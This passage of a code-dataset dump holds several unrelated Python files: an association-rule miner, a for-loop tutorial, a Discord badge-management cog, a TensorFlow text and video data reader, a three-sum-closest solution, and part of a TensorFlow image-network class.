'rolls/buns','=>', 'other vegetables'],['root vegetables', 'yogurt','=>','other vegetables']]\n\t\t\tThe meaning of the output is as follows: {root vegetables, rolls/buns} => {other vegetables} and {root vegetables, yogurt} => {other vegetables} are the two associated rules found by the algorithm\n\n\n\t'''\n\tresult = []\n\tfrequentItemSet = generate_frequent_itemset(transactions,minsup)\n\tfor item in frequentItemSet:\n\t\tcount = 1\n\t\tlength = len(item)\n\t\twhile count < length:\n\t\t\tsubsets = findsubsets(set(item),count)\n\t\t\t# need check all items subsets using confidence\n\t\t\tcount = count + 1\n\n\t\t\tfor subset in subsets:\n\t\t\t\tcount_x = 0\n\t\t\t\tcount_y = 0\n\t\t\t\tx = []\n\t\t\t\ty = []\n\t\t\t\tfor element in subset:\n\t\t\t\t\tx.append(element)\n\t\t\t\tfor transaction in transactions:\n\t\t\t\t\tif all(i in transaction for i in x):\n\t\t\t\t\t\tcount_x = count_x + 1\n\t\t\t\t\tif all(i in transaction for i in item):\n\t\t\t\t\t\tcount_y = count_y + 1\n\t\t\t\tif count_y >= minconf * count_x:\n\t\t\t\t\tfor i in item:\n\t\t\t\t\t\tif i not in x:\n\t\t\t\t\t\t\ty.append(i)\n\t\t\t\t\ttemp = list()\n\t\t\t\t\tfor i in x:\n\t\t\t\t\t\ttemp.append(i)\n\t\t\t\t\ttemp.append('=>')\n\t\t\t\t\tfor i in y:\n\t\t\t\t\t\ttemp.append(i)\n\t\t\t\t\tresult.append(temp)\n\n\treturn result\n\n\ndef main():\n\t# this is for debug in ide\n\t#sys.argv = ['', 'C:\\\\Users\\\\anyone\\\\Desktop\\\\python\\\\data-mining\\\\Association Rule Mining\\\\Data\\\\test.csv', 0.02,0.1]\n\tif len(sys.argv) != 3 and len(sys.argv) != 4:\n\t\tprint(\"Wrong command format, please follwoing the command format below:\")\n\t\tprint(\"python assoc-rule-miner-template.py csv_filepath minsup\")\n\t\tprint(\"python assoc-rule-miner-template.py csv_filepath minsup minconf\")\n\t\texit(0)\n\n\tif len(sys.argv) == 3:\n\t\ttransactions = read_csv(sys.argv[1])\n\t\tresult = generate_frequent_itemset(transactions, float(sys.argv[2]))\n\n\t\t# store frequent itemsets found by your algorithm for automatic marking\n\t\twith open('.'+os.sep+'Output_1'+os.sep+'frequent_itemset_result.txt', 'w') as f:\n\t\t\tfor items in result:\n\t\t\t\toutput_str = '{'\n\t\t\t\tfor e in items:\n\t\t\t\t\toutput_str += e\n\t\t\t\t\toutput_str += ','\n\n\t\t\t\toutput_str = output_str[:-1]\n\t\t\t\toutput_str += '}\\n'\n\t\t\t\tf.write(output_str)\n\telif len(sys.argv) == 4:\n\t\ttransactions = read_csv(sys.argv[1])\n\t\tminsup = float(sys.argv[2])\n\t\tminconf = float(sys.argv[3])\n\t\tresult = generate_association_rules(transactions, minsup, 
minconf)\n\n\t\t# store associative rule found by your algorithm for automatic marking\n\n\t\twith open('.'+os.sep+'Output_1'+os.sep+'assoc-rule-result.txt', 'w') as f:\n\t\t\tfor items in result:\n\t\t\t\toutput_str = '{'\n\t\t\t\tfor e in items:\n\t\t\t\t\tif e == '=>':\n\t\t\t\t\t\toutput_str = output_str[:-1]\n\t\t\t\t\t\toutput_str += '} => {'\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput_str += e\n\t\t\t\t\t\toutput_str += ','\n\n\t\t\t\toutput_str = output_str[:-1]\n\t\t\t\toutput_str += '}\\n'\n\t\t\t\tf.write(output_str)\n\n\nmain()\n","sub_path":"code/H2_2/assoc-rule-miner-template_1.py","file_name":"assoc-rule-miner-template_1.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"587683020","text":"\"\"\"\nII. Loops\n1. for\nThe for loop: iterates over the items of any sequence, in the order in which they appear in the sequence\n\"\"\"\n# Background:\n# print(\"hello world\")\n# print(\"hello world\")\n# print(\"hello world\")\n# print(\"hello world\")\n# print(\"hello world\")\n\n\"\"\"\nSyntax of the for loop\n# variable name: takes each element of the sequence in turn\niterable object: sequences (strings, bytes, lists, tuples) and other iterable objects\ntraversal: visiting every element of an iterable object exactly once.\n\nfor variable_name in sequence (string, bytes, list, tuple) or other iterable object:\n loop body\n\"\"\"\n# Use a for loop to print hello world 5 times\n# for i in \"11111\":\n# print(\"hello world\")\n\n# The iterable can be replaced with anything else, as long as it yields five items.\n# for i in \"12345\":\n# print(\"start:\")\n# print(\"hello world\")\n\n# Add 1 to every element of the iterable\nfor i in \"11111\":\n # print(i,type(i))\n n=int(i)\n n+=1\n print(n)\n\n# 1+2+3+4+5\ns=0\nfor i in \"12345\":\n n=int(i)\n s=s+n\nprint(s)\n\n#1+2+3+...100\n# the range(start,end,step) function: produces a sequence of numbers\n# start is included, end is excluded\n# step: defaults to 1: direction is left to right\n# print(range(1,5)) # [1,2,3,4] python2x\n# print(list(range(1,5))) python3x\na=range(1,5)\nprint(type(a))\nfor i in a:\n print(i)\n\nprint(list(range(1,101)))\n\n# cumulative sum 1+...+100\ns=0\nfor i in range(1,101):\n # s=s+i\n s+=i\nprint(s)\n\n# Exercises\n\"\"\"\n1. Define a string and a bytes object, traverse them with a for loop, and compute their lengths\n\n\"\"\"\ns=\"hello world python\"\nl=0\nfor i in s:\n print(i)\n l=l+1\nprint(\"l computed by the for loop = {}\".format(l))\n# 0 1 2 3 ... len(s)-1\n# for i in range(0,len(s)):\nfor i in range(len(s)):# simplified\n print(\"access each element by index\",s[i])\n\n\n# iterating over bytes yields ascii codes\n# indexing also yields ascii codes\nl1=0\nb=b\"helloworldpython\"\nfor i in b:\n l1+=1\n # print(i)\nprint(\"l1 computed by the for loop = {}\".format(l1))\nfor i in range(len(b)):\n print(\"access a bytes element by index\",b[i])\n\n\n#2. Print all odd numbers from 1 to 100, in two ways\n# print(list(range(1,101,2)))\nfor i in range(1,101):\n if i%2!=0:\n print(i,end=\" \")\nprint()\n#3. Print all even numbers from 1 to 100\nfor i in range(1,101):\n if i%2==0:\n print(i,end=\" \")\n\nprint()\n#4. Given a series of temperatures 30 50 66 99 58 20 in degrees Fahrenheit,\n #we want to convert them to Celsius: celsius=(fahrenheit-32)/1.8\n# (1) each temperature must be converted to Celsius\n#(2) the result should still be a string\n\"\"\"\nApproach:\n(1) how to split the string into individual elements (temperatures): split(\",\")\n (2) process each temperature with a for loop\n convert the temperature to float before processing\n(3) + can concatenate strings\n format can also assemble strings\n\"\"\"\ns=\"30,50,66,99,58,20\"\nprint(s.split(\",\"))\nt=s.split(\",\")\na=\"\"\nfor i in t:\n # print(i) celsius=(fahrenheit-32)/1.8\n x=(float(i)-32)/1.8\n # print(x)\n # a+=str(x)+\",\"\n a+=\"{},\".format(x)\ns=a.rstrip(\",\")\nprint(s)\ns=\"1.2,1.5,1.65892.......\"\n\n\n# 2. Nested loops\n\"\"\"\nSyntax:\nfor i in outer_iterable:\n for j in inner_iterable:\n loop body\nEach time the outer loop runs once, the inner loop runs one complete round.\n\"\"\"\n# print stars *\n# print(\"******\")\n# print(\"*\"*6)\n#\n# for i in range(6):\n# print(\"*\",end=\"\")\n\n# print 10 rows with 6 stars per row\nfor j in range(10):\n for i in range(6):\n print(\"*\", end=\"\")\n print()\n# when writing code, usually write the inner loop first, then the outer loop\n\n\n#3. Breaking out of a loop\n# break: terminates the current loop\n# check whether the string contains a *\nfor i in \"hel*djlkgdljgklgdjdkgj\":\n if \"*\"==i:\n print(\"found *\")\n break\n\n# Read a number and check whether it is prime\n# prime: divisible only by itself and 1\n# it is easier to show that a number is NOT prime\n# num%(2...n-1) !=0 -> prime\n# num%(2...n-1) ==0 -> not prime, break\nimport math\nnum=int(input(\"Please enter a number\"))\ntag=True\n# print(math.sqrt(7))\nfor i in range(2,int(math.sqrt(num))+1):\n if num%i==0:\n print(\"not prime\")\n tag=False\n break\n # else:\n # print(\"prime\")\n# if tag==True:\nif tag:#(simplified)\n print(\"prime\")\n\n# Factorization\n# 8=2*4\n# 8=4*2\n# 16=2*8\n# 16=4*4\n# 16=8*2","sub_path":"python1808/day5/day5-2-for.py","file_name":"day5-2-for.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"125411197","text":"import discord\nfrom discord.ext import commands, tasks\nimport json\nimport requests\nfrom math import ceil\nfrom utils import checks\nfrom utils.badges import grant\nfrom utils.confirmation import confirm\nfrom utils.paginated_send import paginated_send_multiline, paginate_reaction\n\nBADGES_QUERY = \"\"\"\n{\n cms {\n badges {\n items {\n id\n name\n emoji\n description\n earnCriteria\n }\n }\n }\n}\n\"\"\"\n\n# noinspection PyPackageRequirements\n\n\nclass BadgeCog(commands.Cog, name=\"Badge\"):\n def __init__(self, bot):\n self.bot = bot\n self.update_badges.start()\n self.badges = []\n\n def cog_unload(self):\n self.update_badges.cancel()\n\n def gql(self, query):\n result = requests.post(\"https://graph.codeday.org/\",\n json={\"query\": query})\n data = json.loads(result.text)\n if \"errors\" in data:\n print(data[\"errors\"])\n return data[\"data\"]\n\n def get_badge(self, id):\n badges = [b for b in self.badges if (\n b['id'] == id or b['emoji'] == id)]\n if len(badges) > 0:\n return badges[0]\n return None\n\n async def send_list_badges(self, ctx, badges):\n # await paginated_send_multiline(\n # ctx,\n # \"\\n\".join([f\"{b['emoji']} **{b['name']}** (`{b['id']}`, {b['earnCriteria']}) {b['description']}\"\n # for b in badges]))\n all_badges = [f\"{b['emoji']} **{b['name']}** (`{b['id']}`, {b['earnCriteria']}) {b['description']}\"\n for b in badges]\n \n\n def generate_badge_page_embed(badgelist, index, numPages, origlist):\n return discord.Embed.from_dict({\n \"title\": \"Listing all badges\",\n \"description\": \"\\n\".join(badgelist),\n \"footer\": {\n \"icon_url\": str(ctx.author.avatar_url),\n \"text\": f\"Page {1+index}/{numPages} | {len(origlist)} results | Searched by {ctx.author.name}#{ctx.author.discriminator}\"\n }\n })\n \n perPage = 15\n pages = [{\"content\":\"\",\"embed\":generate_badge_page_embed(\n badgelist=all_badges[i:i+perPage], \n index=n,\n numPages=ceil(len(all_badges)/perPage),\n origlist=all_badges)\n } for n,i in enumerate(range(0, len(all_badges), perPage))]\n\n await paginate_reaction(pages, ctx)\n \n\n @tasks.loop(minutes=10)\n async def update_badges(self):\n print(\"updating badges\")\n self.badges = self.gql(BADGES_QUERY)[\"cms\"][\"badges\"][\"items\"]\n\n @commands.group(name=\"badge\")\n async def snippet(self, ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send('Invalid badge command passed...')\n\n @snippet.command(name=\"refresh\")\n @checks.requires_staff_role()\n async def refresh(self, ctx):\n self.badges = self.gql(BADGES_QUERY)[\"cms\"][\"badges\"][\"items\"]\n\n @snippet.command(name='give')\n @checks.requires_staff_role()\n async def give(self, ctx, member: discord.Member, id):\n b = self.get_badge(id)\n if not b:\n await ctx.send(\"I haven't heard of that one.\")\n await 
ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n if b[\"earnCriteria\"] != \"bestowed\":\n await ctx.send(\"I'm not giving those away for free!\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n return\n if await grant(self.bot, member, id):\n await ctx.message.add_reaction('\\N{THUMBS UP SIGN}')\n else:\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n\n @snippet.command(name='give_role')\n @checks.requires_staff_role()\n async def give_role(self, ctx, role: discord.Role, id):\n print(role)\n print(role.members)\n b = self.get_badge(id)\n if not b:\n await ctx.send(\"I haven't heard of that one.\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n elif b[\"earnCriteria\"] != \"bestowed\":\n await ctx.send(\"I'm not giving those away for free!\")\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n elif await confirm(f'Are you sure, this will add a badge to {len(role.members)} person(s)', ctx, self.bot, ):\n await ctx.message.add_reaction('\\N{THUMBS UP SIGN}')\n for member in role.members:\n if not (await grant(self.bot, member, id)):\n await ctx.message.remove_reaction('\\N{THUMBS UP SIGN}', self.bot.user)\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n else:\n await ctx.message.add_reaction('\\N{THUMBS DOWN SIGN}')\n\n @snippet.command(name='list')\n async def list(self, ctx):\n await self.send_list_badges(ctx, self.badges)\n\n @snippet.command(name='info')\n async def info(self, ctx, id):\n b = self.get_badge(id)\n if not b:\n await ctx.send(\"Never heard of it!\")\n return\n await ctx.send(f\"{b['emoji']} **{b['name']}**: {b['description']}\")\n\n @snippet.command(name='inspect')\n async def inspect(self, ctx, member: discord.Member = None):\n\n if member is None: member = ctx.author\n\n query = f\"\"\"{{\n account {{\n getUser(where: {{ discordId: \"{member.id}\"}}, fresh: true) {{\n badges {{\n details {{\n id\n name\n emoji\n description\n earnCriteria\n }}\n }}\n }}\n }}\n }}\n \"\"\"\n result = self.gql(query)\n if not result[\"account\"][\"getUser\"]:\n await ctx.send(\"This user hasn't linked their CodeDay account.\")\n return\n\n badges = result[\"account\"][\"getUser\"][\"badges\"]\n\n await self.send_list_badges(ctx, [b['details'] for b in badges])\n\n\ndef setup(bot):\n bot.add_cog(BadgeCog(bot))\n","sub_path":"src/cogs/badge.py","file_name":"badge.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"474654110","text":" # Copyright 2015 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\n\"\"\"Utilities for parsing PTB text files.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport os\nimport sys\nimport xmltodict\nimport numpy as np\nimport json\nimport pandas as pd\nfrom skimage import measure\nfrom pandas.io.json import json_normalize #package for flattening json in pandas df\nimport tensorflow as tf\n\nPy3 = sys.version_info[0] == 3\n\ndef read_XML(filepath, f_start, f_end, cap=40):\n with open(filepath+'XML/Video_16_3_2_GT.xml') as fd:\n doc = xmltodict.parse(fd.read())\n #print(doc['Frames']['frame'])\n #print(doc['Frames']['frame'][0])\n #print(doc['Frames']['frame'][0]['object'][0]['Point'][0]['@x'])\n #doc['Frames']['frame'][index]['@ID']\n #frame_num = len(doc['Frames']['frame'])\n frame_num = f_end- f_start+1\n target = np.zeros((frame_num, 9*cap))\n for i in range(f_start, f_end+1):\n print('%d th frame', i)\n object_num = len(doc['Frames']['frame'][i-1]['object'])\n for j in range(0, object_num):\n print(j)\n target[i - f_start, j*9] = doc['Frames']['frame'][i-1]['object'][j]['Point'][0]['@x']\n target[i - f_start, j*9+1] = doc['Frames']['frame'][i-1]['object'][j]['Point'][0]['@y']\n target[i - f_start, j*9+2] = doc['Frames']['frame'][i-1]['object'][j]['Point'][1]['@x']\n target[i - f_start, j*9+3] = doc['Frames']['frame'][i-1]['object'][j]['Point'][1]['@y']\n target[i - f_start, j*9+4] = doc['Frames']['frame'][i-1]['object'][j]['Point'][2]['@x']\n target[i - f_start, j*9+5] = doc['Frames']['frame'][i-1]['object'][j]['Point'][2]['@y']\n target[i - f_start, j*9+6] = doc['Frames']['frame'][i-1]['object'][j]['Point'][3]['@x']\n target[i - f_start, j*9+7] = doc['Frames']['frame'][i-1]['object'][j]['Point'][3]['@y']\n target[i - f_start, j*9+8] = 1.0\n return target\n\n\ndef read_json_npy(filepath, index):\n with open(filepath+'json/frame'+format(index, '03d')+'.json') as f:\n d = json.load(f)\n data = np.load(filepath+'npy/frame'+format(index, '03d')+'.npy')\n return d, data\n\n\ndef fusion_data(d, data_shrink, cap=15):\n d1 = np.ndarray.flatten(data_shrink)\n # with default 40 at most\n dim = cap*9\n output = np.zeros((len(d1)+dim),dtype=np.float32)\n for i in range(0, len(d['text_lines'])):\n output[i*9] = d['text_lines'][i]['x0']\n output[i*9+1] = d['text_lines'][i]['y0']\n output[i*9+2] = d['text_lines'][i]['x1']\n output[i*9+3] = d['text_lines'][i]['y1']\n output[i*9+4] = d['text_lines'][i]['x2']\n output[i*9+5] = d['text_lines'][i]['y2']\n output[i*9+6] = d['text_lines'][i]['x3']\n output[i*9+7] = d['text_lines'][i]['y3']\n output[i*9+8] = d['text_lines'][i]['score']\n output[dim:] = d1\n return output\n\n\ndef vect_producer(datapath, frame_start, frame_end, batch_size, num_steps, name=None):\n d, data = read_json_npy(datapath, frame_start)\n data_shrink = measure.block_reduce(np.squeeze(data), (10, 10, 1), 
np.mean)\n vect_encoded = fusion_data(d, data_shrink)\n l1 = len(vect_encoded)\n frame_num = frame_end - frame_start+1\n vect_set = np.zeros((frame_num, l1))\n vect_set[0, :] = vect_encoded\n for index in range(frame_start+1, frame_end+1):\n d, data = read_json_npy(datapath, index)\n data_shrink = measure.block_reduce(np.squeeze(data), (10, 10, 1), np.mean)\n vect_encoded = fusion_data(d, data_shrink)\n vect_set[index-frame_start, :] = vect_encoded\n target = read_XML(datapath, frame_start, frame_end)\n _, l2 = target.shape\n print(vect_set.shape)\n print(target.shape)\n # convert to tensor and using shuffle queue\n with tf.name_scope(name, 'VectProducer', [batch_size, num_steps]):\n input_t = tf.convert_to_tensor(vect_set, name=\"input\", dtype=tf.float32)\n target_t = tf.convert_to_tensor(target, name=\"target\", dtype=tf.float32)\n batch_len = frame_num // batch_size\n epoch_size = (batch_len - 1) // num_steps\n # parsing data from [frame_num, vect_length] to [batch_size, num_steps, vocal_size ]\n data_in = tf.reshape(input_t, [batch_size, batch_len, l1])\n data_gt = tf.reshape(target_t, [batch_size, batch_len, l2])\n # produce an iterable object for index\n i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\n x = tf.strided_slice(data_in, [0, i * num_steps, 0], [batch_size, (i + 1) * num_steps, l1])\n x.set_shape([batch_size, num_steps, l1])\n y = tf.strided_slice(data_gt, [0, i * num_steps, 0], [batch_size, (i + 1) * num_steps, l2])\n y.set_shape([batch_size, num_steps, l2])\n return x, y\n # reshape\n\n\ndef _read_words(filename):\n with tf.gfile.GFile(filename, \"r\") as f:\n if Py3:\n return f.read().replace(\"\\n\", \"\").split()\n else:\n return f.read().decode(\"utf-8\").replace(\"\\n\", \"\").split()\n\n\ndef _build_vocab(filename):\n data = _read_words(filename)\n\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n return word_to_id\n\n\ndef _file_to_word_ids(filename, word_to_id):\n data = _read_words(filename)\n return [word_to_id[word] for word in data if word in word_to_id]\n\n\ndef ptb_raw_data(data_path=None):\n \"\"\"Load PTB raw data from data directory \"data_path\".\n\n Reads PTB text files, converts strings to integer ids,\n and performs mini-batching of the inputs.\n\n The PTB dataset comes from Tomas Mikolov's webpage:\n\n http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz\n\n Args:\n data_path: string path to the directory where simple-examples.tgz has\n been extracted.\n\n Returns:\n tuple (train_data, valid_data, test_data, vocabulary)\n where each of the data objects can be passed to PTBIterator.\n \"\"\"\n\n train_path = os.path.join(data_path, \"ptb.train.txt\")\n valid_path = os.path.join(data_path, \"ptb.valid.txt\")\n test_path = os.path.join(data_path, \"ptb.test.txt\")\n\n word_to_id = _build_vocab(train_path)\n train_data = _file_to_word_ids(train_path, word_to_id)\n valid_data = _file_to_word_ids(valid_path, word_to_id)\n test_data = _file_to_word_ids(test_path, word_to_id)\n vocabulary = len(word_to_id)\n return train_data, valid_data, test_data, vocabulary\n\n\ndef ptb_producer(raw_data, batch_size, num_steps, name=None):\n \"\"\"Iterate on the raw PTB data.\n\n This chunks up raw_data into batches of examples and returns Tensors that\n are drawn from these batches.\n\n Args:\n raw_data: one of the raw data outputs from ptb_raw_data.\n batch_size: int, the batch size.\n 
num_steps: int, the number of unrolls.\n name: the name of this operation (optional).\n\n Returns:\n A pair of Tensors, each shaped [batch_size, num_steps]. The second element\n of the tuple is the same data time-shifted to the right by one.\n\n Raises:\n tf.errors.InvalidArgumentError: if batch_size or num_steps are too high.\n \"\"\"\n with tf.name_scope(name, \"PTBProducer\", [raw_data, batch_size, num_steps]):\n raw_data = tf.convert_to_tensor(raw_data, name=\"raw_data\", dtype=tf.int32)\n\n data_len = tf.size(raw_data)\n batch_len = data_len // batch_size\n data = tf.reshape(raw_data[0: batch_size * batch_len],\n [batch_size, batch_len])\n\n epoch_size = (batch_len - 1) // num_steps\n assertion = tf.assert_positive(\n epoch_size,\n message=\"epoch_size == 0, decrease batch_size or num_steps\")\n with tf.control_dependencies([assertion]):\n epoch_size = tf.identity(epoch_size, name=\"epoch_size\")\n\n i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\n x = tf.strided_slice(data, [0, i * num_steps],\n [batch_size, (i + 1) * num_steps])\n x.set_shape([batch_size, num_steps])\n y = tf.strided_slice(data, [0, i * num_steps + 1],\n [batch_size, (i + 1) * num_steps + 1])\n y.set_shape([batch_size, num_steps])\n return x, y\n\n\n\n\n\n","sub_path":"Part II/Demo1/utils/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":9089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"263940990","text":"class Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n nums = sorted(nums)\n best = 10 ** 7\n\n def update(s):\n nonlocal best\n if abs(s - target) < abs(best - target):\n best = s\n \n nums_len = len(nums)\n for first in range(nums_len):\n if first > 0 and nums[first] == nums[first - 1]:\n continue\n second = first + 1\n third = nums_len - 1\n while second < third:\n s = nums[first] + nums[second] + nums[third]\n if s == target:\n return target\n update(s)\n if s > target:\n while second < third and nums[third] == nums[third - 1]:\n third -= 1\n third -= 1\n else:\n while second < third and nums[second] == nums[second + 1]:\n second += 1\n second += 1\n return best","sub_path":"16 最接近的三数之和/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"645450575","text":"from config import FLAGS, logger\nfrom easydict import EasyDict as edict\nimport tensorflow as tf\nimport pytoolkit.tf_funcs as tfx\nimport utils\n\nclass CENet(object):\n def __init__(self, FLAGS):\n self.batch_size = bs = FLAGS.batch_size # bs: batch size in single GPU\n self.image_size = [szh,szw] = FLAGS.image_size\n self.num_gpus = nG = FLAGS.num_gpus\n self.FLAGS = FLAGS\n\n BS = bs * nG\n\n #self.ph_in_image = tf.placeholder(tf.uint8, shape=(BS, szh, szw, 3), name='ph_in_image')\n #self.ph_gt_image = tf.placeholder(tf.uint8, shape=(BS, szh, szw, 1), name='ph_gt_image')\n #self.ph_datum_wt = tf.placeholder(tf.float32, shape=(BS), name='ph_datum_wt')\n #self.ph_lr = tf.placeholder(tf.float32, shape=None, name='ph_lr')\n\n self.ph_in_image = tf.get_variable(name='ph_in_image', shape=(BS, szh, szw, 3), dtype=tf.uint8, trainable=False)\n self.ph_gt_image = tf.get_variable(name='ph_gt_image', shape=(BS, szh, szw, 1), dtype=tf.uint8, trainable=False)\n self.ph_datum_wt = tf.get_variable(name='ph_datum_wt', shape=(BS), dtype=tf.float32, trainable=False)\n self.ph_lr = tf.get_variable(name='ph_lr', shape=(), 
dtype=tf.float32, trainable=False)\n\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.ph_lr, beta1=0.9)\n\n self.branches = [None] * nG\n\n with tf.device('/cpu:0'):\n for gpu_id in range(nG):\n with tf.device('/gpu:%d' % gpu_id), tf.variable_scope('cpu_variables', reuse=gpu_id>0):\n logger.info('branch: %d' % gpu_id)\n start_idx = bs * gpu_id\n phs = [\n tf.slice(self.ph_in_image, [start_idx, 0, 0, 0], [bs, -1, -1, -1], name='ph_in_image_br%d' % gpu_id),\n tf.slice(self.ph_gt_image, [start_idx, 0, 0, 0], [bs, -1, -1, -1], name='ph_gt_image_br%d' % gpu_id),\n tf.slice(self.ph_datum_wt, [start_idx], [bs], name='ph_datum_wt_br%d' % gpu_id),\n ]\n self.branches[gpu_id] = CENet_Branch(FLAGS, phs, gpu_id, self.optimizer)\n\n self.out = self.merge_results(self.branches)\n self.loss = self.merge_losses(self.branches)\n self.optims = self.merge_optims(self.branches)\n self.summary, self.phs_loss_valid = self.merge_summaries(self.loss, self.var.all_vars)\n\n def merge_results(self, brs):\n return edict({k: tf.concat([b.out[k] for b in brs], 0, name=k) for k in brs[0].out.keys()})\n\n def merge_losses(self, brs):\n out = edict({})\n for k in brs[0].loss.keys():\n total_sum_loss = tf.reduce_sum([b.loss[k] * b.sum_wt for b in brs])\n total_weights = tf.reduce_sum([b.sum_wt for b in brs])\n v = tf.identity(total_sum_loss / (total_weights + 1e-8), name=k+'_loss')\n out[k] = v\n return out\n\n def merge_optims(self, brs):\n phase_grad = edict({k : tfx.average_gradients([b.phase[k] for b in brs], [b.sum_wt for b in brs])\n for k in brs[0].phase.keys()})\n return edict({k : self.optimizer.apply_gradients(v) for k, v in phase_grad.items()})\n\n def merge_summaries0(self, loss, var):\n summary_loss = edict({k + '_summary': tf.summary.scalar(k, v) for k, v in loss.items()})\n summary_weights = edict()\n for v in var:\n name = v.op.name + '_summary'\n summary_weights.update({name: tf.summary.histogram(name, v)})\n summary_loss_valid = {}\n for k, _ in loss.items():\n ph_loss_valid = tf.placeholder(tf.float32, shape=None, name='ph_' + k + '_valid')\n summary_loss_valid[k] = (ph_loss_valid, tf.summary.scalar(k + '_valid', ph_loss_valid))\n return edict({**summary_loss, **summary_weights}), edict(summary_loss_valid)\n\n def merge_summaries(self, loss, var):\n summary_loss = edict()\n phs_loss_valid = edict()\n is_valid = tf.cast(tf.less(self.ph_lr, 0), tf.float32)\n for k, v in loss.items():\n ph_loss_valid = tf.get_variable(name='ph_'+k+'_valid',\n shape=v.get_shape().as_list(), dtype=tf.float32, trainable=False)\n vx = is_valid * ph_loss_valid + (1 - is_valid) * v\n phs_loss_valid[k + '_ph_loss_valid'] = ph_loss_valid\n summary_loss[k + '_summary'] = tf.summary.scalar(k, vx)\n summary_weights = edict()\n for v in var:\n name = v.op.name + '_summary'\n summary_weights.update({name: tf.summary.histogram(name, v)})\n return edict({**summary_loss, **summary_weights}), phs_loss_valid\n\n @property\n def vgg_api(self):\n return self.branches[0].vgg_api\n\n @property\n def var(self):\n return self.branches[0].var\n\nclass CENet_Branch(object):\n def __init__(self, FLAGS, phs, gpu_id, optimizer):\n self.batch_size = FLAGS.batch_size\n self.gpu_id = gpu_id\n self.FLAGS = FLAGS\n\n self.ph_in_image = utils.to_float_tensor(phs[0])\n self.ph_gt_image = utils.to_float_tensor(phs[1])\n self.ph_datum_wt = phs[2]\n\n\n\n # G-Net\n self.rs_ou_image_train, self.layers = self.G_Net_2D(self.ph_in_image, is_train=True, reuse=False)\n self.rs_ou_image_valid, _ = self.G_Net_2D(self.ph_in_image, is_train=False, 
reuse=True)\n\n # Loss\n self.var = self.collect_vars()\n self.loss = self.compute_losses()\n self.phase = self.optimize(optimizer)\n\n # Out\n self.out = edict({\n 'input': utils.to_uint8_tensor(self.ph_in_image),\n 'rs_ou_image_valid': utils.to_uint8_tensor(self.rs_ou_image_valid),\n 'gt': utils.to_uint8_tensor(self.ph_gt_image),\n 'rs_ou_image_train': utils.to_uint8_tensor(self.rs_ou_image_train),\n })\n\n def G_Net_2D_v0(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 1]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 15:\n temp = tf.concat([layers[-1], layers[15 - k]], axis=3)\n else:\n temp = layers[-1]\n layers += [utils.conv_layer_2d(temp, chns[k], etas[k], kszs[k], stps[k],\n 'l%02d' % k, dcvs[k], usbn[k], is_train, usrl[k])]\n return tf.nn.tanh(layers[-1]), layers\n\n def G_Net_2D(self, im, is_train, reuse):\n if self.FLAGS.version == 'v1':\n return self.G_Net_2D_v1(im, is_train, reuse)\n elif self.FLAGS.version == 'v2':\n return self.G_Net_2D_v2(im, is_train, reuse)\n elif self.FLAGS.version == 'v3':\n return self.G_Net_2D_v3(im, is_train, reuse)\n elif self.FLAGS.version == 'v4':\n return self.G_Net_2D_v4(im, is_train, reuse)\n\n def G_Net_2D_v1(self, im, is_train, reuse):\n with tf.variable_scope('generator_im', reuse=reuse) as scope:\n layers = []\n input = im\n chns = [64] + [128] * 2 + [256] * 9 + [128] * 2 + [64, 32, 1]\n #chns = [x // 8 for x in chns[:-1]] + [chns[-1]]\n etas = [1] * 6 + [2, 4, 8, 16] + [1] * 7\n kszs = [5] + [3] * 11 + [4, 3, 4, 3, 3]\n stps = [1, 2, 1, 2] + [1] * 8 + [2, 1, 2, 1, 1]\n dcvs = [False] * 12 + [True, False, True, False, False]\n usbn = [True] * 16 + [False]\n usrl = usbn\n for k in range(17):\n if k == 0:\n temp = input\n elif k < 9:\n temp = layers[-1]\n elif k < 